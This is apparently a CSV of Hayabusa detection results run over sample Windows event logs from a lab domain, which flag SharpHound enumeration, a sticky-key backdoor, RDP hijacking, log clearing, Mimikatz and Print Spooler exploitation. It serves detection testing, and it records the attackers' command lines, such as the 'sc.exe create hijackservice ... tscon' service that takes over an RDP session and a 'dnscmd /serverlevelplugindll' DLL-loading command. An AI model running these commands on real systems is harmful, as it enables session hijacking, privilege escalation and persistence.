0x61e272d5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7a6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x3a7fd7ba,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27d0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x2a1f2809,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9e7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x2220054d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a22,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x28da8a5a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc3f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x258b9ee5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor 
Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-03 21:07:07.639 +09:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 
0x13b593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:39:35.406 +09:00,fs01.offsec.lan,4697,info,Persis,Service Installed,Name: hijackservice | Path: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x13b593d,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-15 05:40:16.839 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:16.853 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:18.194 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:18.327 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:26.942 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | 
LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.455 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.640 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.676 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
+2021-05-15 05:40:29.706 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" 
/s | Path: C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx +2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:01:05.358 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:01:07.150 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:01:37.111 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:02:14.789 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-15 06:02:35.208 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll 
